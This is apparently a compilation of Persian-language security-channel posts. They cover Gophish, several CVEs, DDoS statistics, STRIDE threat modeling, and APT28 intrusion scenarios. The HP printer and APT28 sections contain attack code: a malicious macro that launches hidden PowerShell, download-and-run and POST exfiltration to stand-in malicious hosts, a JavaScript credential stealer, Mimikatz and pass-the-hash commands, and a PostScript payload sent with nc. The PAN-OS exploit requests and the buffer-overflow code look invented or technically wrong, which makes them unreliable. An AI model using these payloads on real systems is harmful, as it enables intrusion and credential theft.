👈 معرفی ابزار Gophish

⬅️یکی از ابزارهایی که که تو کتاب "راهنمای عملی مهندسی اجتماعی برای سازمان‌ها" در موردش صحبت کردیم، Gophish هست. Gophish یه فریم‌ورک اوپن‌سورس برای شبیه‌سازی حملات فیشینگه که برای اهداف آموزشی و تست امنیت سازمانا طراحی شده. این ابزار به زبون برنامه‌نویسی Go نوشته شده و در حقیقت یه ابزار خودکار شبیه‌سازیه حملات فیشینگه. برای استفاده از Gopish نیاز به یه سرور SMTP برای ارسال ایمیل از طریق اون و یه وب‌سرور برای لیندینگ تارگت‌هامون داریم. با اینکه میشه هر دو مورد رو داخل Gophish هندل کرد، اما انجام اینکار باعث میشه شانس شناسایی‌مون هم بالا بره.
برای اینکه این ریسک شناسایی کمتر بشه پیشنهاد می‌شه این سه رول داخل فایروال ست بشن:
✅ فقط از شبکه خودتون اجازه دسترسی به پورت TCP/3333 (پورت رابط وب مدیریت) Gophish و پورت 22 (SSH) رو بدین.
✅ فقط از شبکه خودتون و محدوده IP تارگت اجازه دسترسی به پورت TCP/80 (پورت پیش‌فرض برای صفحه لندینگ شما، گرچه می‌تونین از پورت 443 با یک سرتیفیکیت SSL/TLS برای واقع‌گرایی بیشتر استفاده کنین) رو بدین.
✅ فقط تو جهت خروجی به پورت TCP/25 (پورت برای ترافیک SMTP) اجازه دسترسی بدین.

⬅️ویژگی‌های مهم Gophish:
✅ شبیه‌سازی حملات فیشینگ
✅ مدیریت آسون کمپین‌ها
✅ شخصی‌سازی حملات
✅ گزارش‌دهی و تجزیه و تحلیل
✅ پشتیبانی از ایمیل‌ها و صفحات فیشینگ با طراحی سفارشی
✅ ادغام با سیستم‌های دیگه

⚠️ برای نصب Gopish هم می‌تونین از دستورات زیر استفاده کنین:

cd /opt/
git clone https://github.com/gophish/gophish
cd gophish
apt-get install golang -y
go get github.com/gophish/gophish
go build

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری بحرانی در OpenSSH با شناسه CVE-2024-6387

❕ یه آسیب‌پذیری با شدت high تو پروتکل OpenSSH کشف شده که به هکرها اجازه می‌ده بدون نیاز به احراز هویت و بصورت ریموت و با دسترسی کامل با یوزر root، کد دل‌خواه خودش رو روی سیستم هدف اجرا کنن و این یعنی کنترل کامل روی سیستم آسیب‌پذیر.

❕ علت اصلی بوجود اومدن این آسیب‌پذیری، race condition هست (وقتی اتفاق میفته که چن‌تا فرآیند به‌طور همزمان به یه سورس مشترک دسترسی پیدا می‌کنن و ترتیب اجرای اونا می‌تونه روی نتیجه نهایی تاثیر بزاره). در مورد این آسیب‌پذیری، race condition تو نحوه مدیریت سیگنال‌های دریافتی که توسط SSH دریافت می‌شه، اتفاق میفته.

❕ برای رفع آسیب‌پذیری توسعه‌دهنده‌های OpenSSH خیلی سریع یه نسخه جدید رو منتشر کردن که این آسیب‌پذیری داخلش برطرف شده.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

🟢 مهندس امینی لطف کردن و یه دوره رایگان مربوط به بحث جرم‌شناسی حافطه (Memory Forensics) رو رکورد کردن و داخل آپارات به رایگان قرار دادن. این دوره ۲۱ کلیپ آموزشی داره و از لینک زیر قابل دسترس هست:

https://www.aparat.com/playlist/1569341

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ گزارش تحلیلی و آماری
⚠️ از حملات DDoS علیه زیرساخت‌های کشور در فصل پاییز 1403
⚠️ ارائه توسط شرکت ارتباطات زیرساخت

✅ خلاصه این گزارش:
‌
✅ تعداد حمله‌ها: به صورت میانگین روزانه ۶۳۵ حمله، مجموعا ۵۷,۲۱۸ حمله
✅ حجم حمله‌ها: میانگین ۳۶.۴۳ گیگابایت بر ثانیه و مجموعا ۱۲.۵۸ پتابایت در کل پاییز
✅ میانگین مدت زمان حمله‌ها: ۴دقیقه و ۳۷ ثانیه
✅ طولانی‌ترین حمله: ۴ روز و ۹ ساعت و ۵۰ دقیقه
✅ بیشترین تعداد حمله هم‌زمان: ۱۴۸ حمله
✅ منابع حمله‌ها: ۶۴ درصد حملات از ۱۰ کشور، بیش از ۱۵ درصد از روسیه، سپس اندونزی (۱۰٪) و اوکراین (۵٪)
✅ روش‌ها: از هر ۱۰۰ حمله ۳۵ حمله (۳۵٪) از طریق شبکه دستگاه‌های آلوده (Bot Pool)
‌‌
✅هدف‌های با بیشترین حمله‌ها:
✅ ۱۸٪: شرکت‌های اینترنت سیار
✅ ۱۷٪: کسب‌وکارهای اینترنتی
✅ ۱۴٪: شرکت‌های اینترنت ثابت
‌
✅ مقاصد پرحمله: ۵۰۰ مقصد بیش از ۲۵۰ بار مورد حمله قرار گرفتند.
✅ حمله‌های کوتاه و کم‌حجم: بیشترین حملات در محدوده زیر ۲ گیگابایت بر ثانیه و کمتر از ۵ دقیقه
✅ سرویس‌های آسیب‌پذیر: اپراتورهای همراه، کسب‌وکارهای اینترنتی، اپراتورهای ثابت و درگاه‌های خدمات آنلاین

🚨 نقش دستگاه‌های آلوده: بسیاری از این حملات با استفاده از دستگاه‌های آلوده کاربران و بدون اطلاع آن‌ها انجام شده است.
‌
🚨 نتیجه کلی: فیلترینگ گسترده و نصب اپلیکیشن‌های فیلترشکن مختلف توسط کاربرها (به ناچار)، نقش مهمی در در افزایش این حملات داشته است و دستگاه کاربرهای زیادی بدون اینکه بدانند، در این حمله‌ها مشارکت دارد!

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری با شناسه CVE-2024-55591 یه نقص امنیتی بحرانی تو محصولات Fortinet، شامل FortiOS و FortiProxy، هست که به هکرها اجازه می‌ده با ارسال درخواست‌های خاص به ماژول WebSocket تو Node.js، احراز هویت رو بایپس کنن و به سطح دسترسی «سوپر ادمین» برسن. این آسیب‌پذیری تو نسخه‌های زیر تأیید شده:

FortiOS نسخه‌های 7.0.0 تا 7.0.16

FortiProxy نسخه‌های 7.0.0 تا 7.0.19 و 7.2.0 تا 7.2.12


این نقص به‌عنوان «دور زدن احراز هویت با استفاده از مسیر یا کانال جایگزین» (CWE-288) طبقه‌بندی می‌شه. مهاجم با ارسال درخواست‌های دستکاری‌شده به ماژول WebSocket تو ۸ Node.js می‌تونه کنترل کامل دستگاه ره به دست بگیره.

شاخص‌های سازشی (IoC):

ورودهای لاگ زیر ممکنه نشون‌دهنده اکسپلویت از این آسیب‌پذیری باشن:

ورود موفق ادمین با رابط کاربری "jsconsole" و آدرس‌های IP مثل 1.1.1.1 یا 127.0.0.1:

type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 action="login" status="success" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"

ایجاد حساب ادمین با نام کاربری تصادفی:

type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgpath="system.admin" cfgobj="vOcep" msg="Add system.admin vOcep"


توجه داشته باشید که آدرس‌های IP ذکرشده ممکنه توسط مهاجم به‌صورت دلخواه تنظیم شده باشن و لزوماً نشون‌دهنده منبع واقعی حمله نیستن.

راهکارها:
1. به‌روزرسانی نرم‌افزار:
برای FortiOS: به نسخه 7.0.17 یا بالاتر ارتقا بدین.
برای FortiProxy: به نسخه 7.0.20 یا 7.2.13 یا بالاتر ارتقا بدین.

2. غیرفعال‌سازی رابط مدیریتی HTTP/HTTPS:
در صورت امکان، این رابط‌ها رو غیرفعال کنین یا دسترسی به اونارو محدود کنین.

3. محدود کردن دسترسی به رابط مدیریتی:
با استفاده از پالیسی‌های لوکال (local-in policies)، دسترسی به رابط مدیریتی رو به آدرس‌های IP مشخص محدود کنین.

4. استفاده از یوزرنیم‌های غیرمعمول برای ادمین:
استفاده از یوزرنیم‌های پیچیده و غیرقابل حدس برای حساب‌های ادمین می‌تونه تا حدی از اکسپلویت جلوگیری کنه.

توجه داشته باشین که این آسیب‌پذیری به‌طور فعال در حال بهره‌برداریه و توصیه می‌شه اقدامات لازم را تو اسرع وقت انجام بدین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ رویترز گزارشی داده مبنی بر اینکه یه شرکت اسرائیلی به اسم Paragon Solutions با استفاده از جاسوس‌افزارش، حدود ۹۰ کاربر واتساپ، از جمله روزنامه‌نگارا و فعالای مدنی تو بیشتر از ۲۰ کشور رو هدف قرار داده. که البته گفته شده این حملات تو دسامبر ۲۰۲۴ شناسایی و متوقف شدن.
روش نفوذ به‌صورت "Zero-Click" انجام شده‌؛ به این معنی که تارگت بدون نیاز به کلیک یا تعامل با محتوای مخرب، آلوده شده‌. تو این روش، هکرها فایلای PDF حاوی کدهای مخرب رو برای تارگت ارسال کردن که با باز کردن این فایلا، جاسوس‌افزار به‌صورت خودکار فعال می‌شده.
جاسوس‌افزار Graphite، محصول Paragon، قادره به دیتای شخصی کاربرا دسترسی پیدا کنه، از جمله:
✅خوندن پیامای رمزنگاری‌شده
✅دسترسی به مخاطبین
✅دسترسی به موقعیت جغرافیایی
✅فعال‌سازی میکروفون و دوربین دستگاه

✅ واتساپ بعد از شناسایی این حمله، با ارسال نامه‌ای به Paragon، خواسته که فعالیتاشون تو این حمله رو متوقف کنن و اعلام کرده که به دفاع از حریم خصوصی کاربران خودش ادامه می‌ده.
✅ شرکت اسرائیلی Paragon Solutions که توسط افسرای سابق واحد ۸۲۰۰ ارتش اسرائیل تأسیس شده، ادعا می‌کنه که ابزارای خودش رو تنها به دولتای دموکراتیک و برای مقاصد قانونی می‌فروشه. از نظر من فعالیتشون خیلی شبیه شرکت NSO و انگاری بعد از افشای فعالیتای اون شرکت، اومدن تو قالب این شرکت دارن فعالیتشون رو ادامه می‌دن. قبلا یه پادکستی در مورد شرکت NSO و پگاسوس تولید کردم که ‌می‌تونین از لینک زیر گوش بدین:

🎹 CastBox

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

💠 مدل‌سازی تهدید (Threat Modeling) یه فرآیند تحلیلیه که برای شناسایی، ارزیابی و کاهش تهدیدات امنیتی تو سیستم‌های نرم‌افزاری و شبکه‌ها استفاده می‌شه. هدف از مدل‌سازی تهدید شناسایی آسیب‌پذیری‌ها قبل از وقوع حملات سایبری و ارائه راهکارهای مناسب برای کاهش ریسکه.
یکی از متودولوژی‌هایی که تو این حوزه شناخته شده‌اس، فریم‌ورک STRIDE هست که توسط شرکت مایکروسافت توسعه داده شده و برای شناسایی، دسته‌بندی و ارزیابی تهدیدات امنیتی تو سیستم‌های نرم‌افزاری و شبکه‌ها ازش استفاده می‌شه.

⬅️ کلمه STRIDE از حروف اول شش کلمه تشکیل شده:
✅حرف S: مخفف Spoofing به مفهوم جعل هویت کاربران
✅حرف T: مخفف Tampering به مفهوم دستکاری دیتاها
✅حرف R: مخفف Repudiation به مفهوم انکار اقدامات
✅حرف I: مخفف Information Disclosure به مفهوم افشای اطلاعات
✅حرف D: مخفف Denial of Service به مفهوم جلوگیری از ارائه سرویس
✅و حرف E: مخفف Elevation of Privilege به مفهوم ارتقای سطح دسترسی غیرمجاز

✅ جعل هویت (Spoofing):
تو این حمله، مهاجم هویت یه کاربر، فرآیند یا سیستم دیگه رو جعل می‌کنه تا دسترسی غیرمجاز به اطلاعات و منابع داشته باشه.
🔴مثال‌های رایج:
🔘جعل آدرس IP برای ورود غیرمجاز به شبکه
🔘حملات فیشینگ برای سرقت اطلاعات ورود

✅ دستکاری داده‌ها (Tampering):
تو این حمله، مهاجم دیتاهای تو حال ترنسفر یا ذخیره‌شده رو تغییر می‌ده تا اطلاعات مخرب یا نادرست جایگزین بشن.
🔴مثال‌های رایج:
🔘حمله Man-in-the-Middle (MITM) برای تغییر پیام‌های ارسال‌شده
🔘دستکاری دیتابیس‌ها برای تغییر اطلاعات کاربران

✅ انکار عملیات (Repudiation):
این نوع تهدید وقتی رخ می‌ده که کاربر یا مهاجم بعد از انجام یه عملیات، اون رو انکار کنه و سیستم مدرکی برای اثبات اون نداشته باشه.
🔴مثال‌های رایج:
🔘کاربری که تراکنش مالی رو انجام داده اما انکار می‌کنه.
🔘ارسال ایمیل جعلی و ادعای اینکه این ایمیل ارسال نشده.

✅ افشای اطلاعات (Information Disclosure):
این نوع تهدید وقتی رخ می‌دهه که دیتاهای محرمانه در اختیار افراد غیرمجاز قرار بگیرن.
🔴مثال‌های رایج:
🔘نشت اطلاعات شخصی کاربران از دیتابیس‌های عمومی.
🔘عدم استفاده از HTTPS که باعث لو رفتن دیتاها تو حملات شنود می‌شه.

✅ جلوگیری از ارائه سرویس (Denial of Service - DoS):
این نوع حمله باعث می‌شه که یه سیستم یا سرویس، دیگه تو دسترس کاربرای مجاز نباشه.
🔴مثال‌های رایج:
🔘حملات DDoS که باعث مصرف بیش از حد منابع سرور می‌شه.
🔘ارسال حجم زیادی از درخواست‌های جعلی به یه سرور وب.

✅ ارتقای دسترسی غیرمجاز (Elevation of Privilege):
تو این حمله، مهاجم دسترسی‌های خودش رو از سطح عادی به سطح مدیر (Administrator) افزایش می‌ده.
🔴مثال‌های رایج:
🔘حمله Buffer Overflow برای اجرای کدهای مخرب با سطح دسترسی بالا.
🔘دور زدن مکانیزم‌های احراز هویت و اجرای دستورات سیستمی.

⬅️ نحوه پیاده‌سازی STRIDE تو امنیت سیستم‌ها:

✅ مدل‌سازی تهدیدات (Threat Modeling)
🔴شناسایی تمام اجزای سیستم (مثل سرورها، دیتابیس‌ها، APIها و کاربران)
🔴تحلیل و بررسی مسیرهای دیتا و نقاط حساس تو سیستم
🔴استفاده از ابزارهایی مثل Microsoft Threat Modeling Tool

✅ دسته‌بندی تهدیدات بر اساس STRIDE
🔴بررسی اینکه هر جز سیستم، در برابر کدوم نوع از تهدیدات STRIDE آسیب‌پذیره

✅ پیاده‌سازی راه‌کارهای امنیتی
🔴رمزگذاری دیتاها، احراز هویت قوی، بررسی لاگ‌ها و استفاده از فایروال‌ها

✅ نظارت و تست امنیتی
🔴اجرای تست نفوذ (Penetration Testing) و ارزیابی امنیتی به‌صورت دوره‌ای

پ.ن: این محتوا برگرفته از کتاب "راهنمای معماری امنیت سایبری" هست. برای تهیه این کتاب می‌تونین به آی‌دی @liantrain پیام بدین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ یه آسیب‌پذیری با شناسه CVE-2025-24200 منتشر شده که یه نقص امنیتی تو دستگاه‌های iPhone و iPadه که به مهاجمای فیزیکی امکان می‌ده حالت محدودیت USB رو تو دستگاه‌های قفل‌شده غیرفعال کنن. این آسیب‌پذیری به دلیل یه مشکل تو مدیریت وضعیت مجوزها به وجود اومده. حالت محدودیت USB قابلیتیه که ارتباط دستگاه با لوازم جانبی USB رو بعد از یه ساعت عدم استفاده، محدود می‌کنه تا از دسترسی غیرمجاز به دیتاها جلوگیری بشه. این آسیب‌پذیری به مهاجم فیزیکی اجازه می‌ده تا با غیرفعال کردن حالت محدودیت USB، به دیتاهای حساس دستگاه دسترسی پیدا کنه یا بدافزار رو نصب کنه.

✅ جزئیات فنی:
✅نوع آسیب‌پذیری: مشکل در مدیریت مجوزها (Authorization Issue)
✅شناسه: CVE-2025-24200
✅امتیاز CVSS: 6.1 (متوسط)
✅بردار حمله: دسترسی فیزیکی (AV:P)
✅پیچیدگی حمله: پایین (AC:L)
✅سطح دسترسی مورد نیاز: بدون نیاز به دسترسی (PR:N)
✅تأثیر بر محرمانگی: بالا (C:H)
✅تأثیر بر یکپارچگی: بالا (I:H)
✅تأثیر بر دسترس‌پذیری: ندارد (A:N)

⬅️ برای محافظت از دستگاه‌هاتون در برابر این آسیب‌پذیری، توصیه می‌شه سیستم‌عامل دستگاه رو به آخرین نسخه به‌روزرسانی کنین. برای این کار، به مسیر Settings > General > Software Update برید و دستورالعمل‌ها رو دنبال کنین.
⬅️ این آسیب‌پذیری توسط بیل مارزاک از Citizen Lab تو دانشگاه تورنتو کشف شده. اپل اعلام کرده که از گزارش سواستفاده از این نقص تو یه حمله بسیار پیچیده علیه افراد خاص، مطلع شده.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری CVE-2025-0108 یه نقص امنیتی با شدت بالا تو نرم‌افزار PAN-OS شرکت Palo Alto Networksه که به مهاجم اجازه می‌ده تا بدون نیاز به احراز هویت، به پنل مدیریتی Palo Alto Networks PAN-OS دسترسی پیدا کنه. این کار از طریق بایپس مکانیزم احراز هویت تو صفحات مدیریتی وب انجام می‌شه. به طور خلاصه، این آسیب‌پذیری از یه نقص منطقی (Logic Flaw) تو بررسی اعتبار کاربر ناشی می‌شه که باعث می‌شه بعضی از درخواست‌ها بدون نیاز به توکن ورود (Session Token) پردازش بشن.

✅ دسته‌بندی آسیب‌پذیری:
✅نوع: دور زدن احراز هویت (Authentication Bypass)
✅سطح خطر: بالا
✅هدف: سیستم‌عامل امنیتی PAN-OS که تو فایروال‌های Palo Alto Networks استفاده می‌شه
✅حملات محتمل: دسترسی غیرمجاز به پنل مدیریت، اجرای کد PHP، تغییر تنظیمات امنیتی

✅ روش‌های سوءاستفاده از آسیب‌پذیری CVE-2025-0108

⬅️ یک: اجرای درخواست بدون احراز هویت
مهاجم می‌تونه با ارسال یک درخواست (HTTP Request) دستکاری‌شده به سرور PAN-OS، احراز هویت رو دور بزنه.

GET /php/system.php HTTP/1.1
Host: target-firewall
User-Agent: Mozilla/5.0

ری‌کوئست بالا بدون نیاز به لاگین، به سرور ارسال میشه و تو بعضی نسخه‌های آسیب‌پذیر، سرور پاسخ معتبر ارسال می‌کنه. اگه این صفحه مدیریتی دسترسی به اسکریپت‌های PHP داشته باشه، مهاجم می‌تونه دستورات مخرب اجرا کنه.

⬅️ دو: اجرای کد مخرب تو محیط PHP
از اونجایی که PAN-OS بعضی اسکریپت‌های PHP اجرایی داره، اگه مهاجم موفق بشه از صفحات بدون احراز هویت ری‌کوئست‌هایی بفرسته که به پارامترهای ورودی PHP دسترسی دارن، می‌تونه کد دلخواه رو اجرا کنه.

GET /php/admin.php?cmd=whoami HTTP/1.1
Host: firewall-target

اگر سرور پاسخ بده:

admin

نشان می‌ده که مهاجم می‌تونه دستورات سیستمی رو روی سرور اجرا کنه.

⬅️ سه: تغییر تنظیمات فایروال و ایجاد کاربر جدید
اگه مهاجم موفق به ارسال ری‌کوئست معتبر بدون احراز هویت بشه، می‌تونه:
یه کاربر جدید تو سیستم ایجاد کنه.
رول‌های فایروال رو تغییر بده و ترافیک رو به نفع خودش route کنه.
تنظیمات لاگ رو غیرفعال کنه تا فعالیت‌های مخرب شناسایی نشه.
مثال درخواست مخرب برای ایجاد یه کاربر جدید:

POST /php/api.php HTTP/1.1
Host: target-firewall
Content-Type: application/json

{
  "action": "createUser",
  "username": "hacker",
  "password": "SuperSecretPass",
  "role": "admin"
}

اگه سرور آسیب‌پذیر باشه، ری‌کوئست بالا یه حساب ادمین جدید برای مهاجم ایجاد می‌کنه.

✅ چطور از این حمله جلوگیری کنیم؟
✅آپدیت فوری PAN-OS به نسخه‌ای که در برابر این آسیب‌پذیری مقاومه.
✅محدود کردن دسترسی به اینترفیس مدیریتی فقط از طریق VPN یا آی‌پی‌های مجاز.
✅فعال‌سازی احراز هویت دو مرحله‌ای (2FA) برای دسترسی به پنل.
✅بررسی لاگ‌ها و تلاش‌های مشکوک برای ورود غیرمجاز.

✅ این آسیب‌پذیری یکی از خطرناک‌ترین نقاط ضعف امنیتی PAN-OS تو سال 2025 محسوب می‌شه و توسط گروه‌های هکری برای دور زدن فایروال سازمان‌ها و کنترل شبکه‌های حساس مورد استفاده قرار گرفته.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری با شناسه CVE-2025-26506 تو پرینترهای HP

آسیب‌پدیری با شناسه CVE-2025-26506 تو پرینترهای HP شناسایی شده. این آسیب‌پذیری از نوع Stack-Based Buffer Overflow - CWE-121ه که موقع پردازش فایل‌های PostScript تو پرینترهای HP رخ می‌ده. تو این نوع حمله، ورودی فراتر از اندازه بافر تعیین‌شده به داخل استک نوشته می‌شه، که در صورت اکسپلویت موفق، می‌تونه منجر به RCE بشه. هکر می‌تونه با ارسال یه فایل PostScript مخرب، کد دلخواهش رو بصورت ریموت اجرا کنه و سطح دسترسیش رو افزایش بده.

⬅️ بردار حمله (Attack Vector)
مهاجم برای اکسپلویت این آسیب‌پذیری، یه فایل PostScript مخرب رو به پرینتر ارسال می‌کنه. این کارو می‌تونه از طریق روش‌های زیر انجام بده:
✅ پورت‌های شبکه‌ای باز پرینتر (مانند 9100/TCP, LPD, IPP)
✅ اتصال مستقیم از طریق USB (در صورتی که فایل تو صف چاپ قرار بگیره)
✅ استفاده از ایمیل یا اشتراک شبکه (ارسال فایل PostScript مخرب به تارگتی که اون رو برای چاپ ارسال کنه)
پس از پردازش فایل، مقدار زیادی دیتا به بافر استک نوشته می‌شه که باعث خرابی حافظه می‌شه و کنترل پردازش رو به هکر منتقل می‌کنه.

⬅️ سناریوی بهره‌برداری (Exploitation)

🔹 گام 1: شناسایی سیستم هدف
هکر ابتدا باید تعیین کنه که آیا پرینتر هدف، جز مدل‌های آسیب‌پذیر هست یا نه. این کار از طریق دو روش زیر می‌تونه انجام بشه:
اسکن شبکه با استفاده از ابزارهایی مثل nmap:

nmap -p 9100,515,631 -A -T4 <target-IP>
or
nmap -p 9100,515,631 --noscript hp-jetdirect-info -O -sV <target-IP>

اگه پورت 9100 (JetDirect), پورت 515 (LPD) یا 631 (IPP) باز باشه، پرینتر مستعد حمله‌اس.
بررسی بنر دستگاه:

nc <target-IP> 9100

بعضی پرینترها تو ریسپانس، اطلاعات مربوط به مدل و فریمور رو ارسال می‌کنن.

🔹 گام 2: ایجاد یه فایل PostScript مخرب
پست‌اسکریپت یه زبان توصیف صفحه‌اس که توسط خیلی از پرینترها پشتیبانی می‌شه. یه نمونه کد مخرب برای سرریز بافر می‌تونه به این شکل باشه:

%!PS
% ایجاد یه حلقه بی‌پایان برای افزایش بار پردازش
userdict begin
100 dict begin
/Buffer 1024 string def
0 1 20000 {
    Buffer (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) putinterval
} for
end
end

این کد بافر استک رو بیش از حد پر می‌کنه و باعث کرش یا اجرای کد دلخواه می‌شه.

🔹 گام 3: ارسال فایل مخرب به پرینتر
مهاجم می‌تونه فایل رو با یکی از روش‌های زیر به پرینتر ارسال کنه:
از طریق Netcat:

nc <target-IP> 9100 < exploit.ps

از طریق LPD (Line Printer Daemon):

lpr -H <target-IP> -P raw -o raw exploit.ps

یا اگه پرینتر به شبکه‌ای با ایمیل متصل باشه، مهاجم می‌تونه فایل رو تو قالب یه پیوست برای پرینتر ارسال کنه.

🔹 گام 4: اجرای کد بصورت ریموت:
در صورت موفقیت، این حمله می‌تواند:
✅ اجرای دستورات دلخواه تو سطح فریمور پرینتر
✅ دریافت Shell Access برای اجرای دستورات بیشتر
✅ ایجاد یه بکدور تو دستگاه برای حملات آینده

⬅️ پتانسیل استفاده تو حملات پیشرفته (Advanced Exploitation)
اگه مهاجم کنترل یه پرینتر متصل به شبکه داخلی سازمان رو به دست بگیره، می‌تونه:
یک. MITM Attack: ترافیک اسناد چاپی رو رهگیری و تغییر بده.
دو. Pivot Attack: از پرینتر به عنوان نقطه محوری برای نفوذ بیشتر به شبکه استفاده کنه.
سه. Backdoor Installation: از پرینتر برای ایجاد یک نقطه دسترسی دائمی به شبکه سازمان بهره ببره.

⬅️ راه‌کارهای امنیتی (Mitigation)
✅ آپدیت فریمور پرینتر
✅ محدود کردن دسترسی به پورت‌های 9100، 515 و 631 از طریق فایروال
✅ غیرفعال کردن پردازش PostScript تو تنظیمات پرینتر (اگه امکان‌پذیر باشه)
✅ مانیتورینگ لاگ‌های پرینتر برای شناسایی فعالیت‌های غیرعادی
✅ محدود کردن دسترسی پرینتر به کاربرای احراز هویت‌شده

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو یک: نفوذ به شبکه‌ وزارت امور خارجه آلمان با هدف جاسوسی از ارتباطات دولتی با بدافزار Seduploader

🔹 هدف:
✅نفوذ به سیستم‌های دیپلماتیک برای سرقت اطلاعات حساس
✅استقرار بدافزار برای مانیتورینگ و جمع‌آوری دیتاها
✅حرکت جانبی (Lateral Movement) برای گسترش حضور تو شبکه

🔹 گام 1: مهندسی اجتماعی و نفوذ اولیه
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر می‌رسیده از طرف یه سازمان بین‌المللی معتبر مثل EU External Action Service (EEAS) باشه.

فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده می‌کرده. بعد از باز شدن فایل، ماکرو فعال می‌شده و PowerShell رو برای دانلود بدافزار اجرا می‌کرده:

Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub

🔹 گام دو: دانلود و پیاده‌سازی بدافزار Seduploader
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاری‌شده بوده؛ بدافزار اصلی رو دانلود می‌کرده:

$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path

ویژگی‌های بدافزار Seduploader
- بررسی سیستم: اطلاعات اولیه (مثل نسخه‌ ویندوز، یوزرنیم، پردازنده) رو جمع‌آوری می‌کنه.
- اجرای دستورات از راه دور (Remote Command Execution)
- ثبت کلیدهای زده‌شده (Keylogging)
- آپلود و دانلود فایل‌های مخرب
- استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2

ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ری‌کوئست‌های DNS برای ارسال اطلاعات به سرور C2 استفاده می‌کنه:

nslookup -type=TXT x7c9.malicious-domain.com

دیتاها به صورت Base64 یا XOR Encoding انکریپت شده‌ان.

🔹 گام سه: حرکت جانبی (Lateral Movement)
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هش‌های رمزعبور استفاده کرده:

privilege::debug
sekurlsa::logonpasswords

دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستم‌ها
اعضای APT28 با استفاده از هش‌ها به سیستم‌های دیگه متصل می‌شدن:

psexec \\target-system -u administrator -p NTLMHASH cmd.exe

سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده می‌شده:

Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"

🔹 گام چهار: استخراج دیتاها (Exfiltration)
ارسال دیتاهای سرقت‌شده با پاورشل

$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes

🔹 نتیجه:
اعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سه سناریو واقعی از نفوذهای گروه APT28

🔹سناریو دو: حمله به کمیته ملی دموکرات (DNC) با فیشینگ و بدافزار X-Agent

🔹مقدمه:
گروه APT28 (Fancy Bear) تو سال 2016 حمله‌ای پیشرفته به کمیته ملی دموکرات (DNC) انجام داد که منجر به نشت اطلاعات حساس از ایمیل‌های مقامات عالی‌رتبه حزب دموکرات شد. این حمله یه عملیات پیچیده‌ جاسوسی سایبری بود که شامل مهندسی اجتماعی، اکسپلویت آسیب‌پذیری‌ها، نصب بدافزار، حرکت جانبی (lateral movement) و استخراج دیتاها بود. دیتاهای سرقت شده در نهایت توسط WikiLeaks منتشر شد که تأثیر زیادی روی انتخابات آمریکا گذاشت.

🔹مرحله 1: نفوذ اولیه از طریق فیشینگ هدفمند
گروه APT28 از حملات Spear Phishing برای Credential Harvesting کارمندای DNC استفاده کرده. ایمیل‌های فیکی که شبیه هشدارهای امنیتی گوگل بودن، برای مقامات ارسال شدن. هدف این بوده که اونا رو وادار به وارد کردن یوزرنیم و پسوردشون تو یه صفحه لاگین فیک کنن.

Subject: Unauthorized Access Detected – Change Your Password Immediately
From: Google Security Team <no-reply@security-google.com>

👈 ساخت صفحه لاگین جعلی
گروه APT28 صفحه‌ای که مشابه صفحه لاگین گوگل بوده رو طراحی کرده. این صفحه از طریق HTML و JavaScript اطلاعات لاگین تارگت رو سرقت می‌کرده. یه نمونه‌ از کد JavaScript تو صفحه لاگین فیک:

document.getElementById("login").onsubmit = function() {
    fetch("https://malicious-site.com/steal", {
        method: "POST",
        body: JSON.stringify({
            email: document.getElementById("email").value,
            password: document.getElementById("password").value
        })
    });
};

👈 استفاده از URL‌های کوتاه‌شده برای پنهان‌سازی لینک جعلی
گروه APT28 از سرویس‌های کوتاه‌کننده URL (مثل Bit.ly) برای مخفی کردن آدرس واقعی صفحه فیک استفاده کرده. مثال لینک مخرب:

https://bit.ly/secure-google-login

🔹مرحله 2: دسترسی به ایمیل‌ها و نصب بدافزار X-Agent
پس از دستیابی به پسوردها چه اتفاقی می‌افته؟
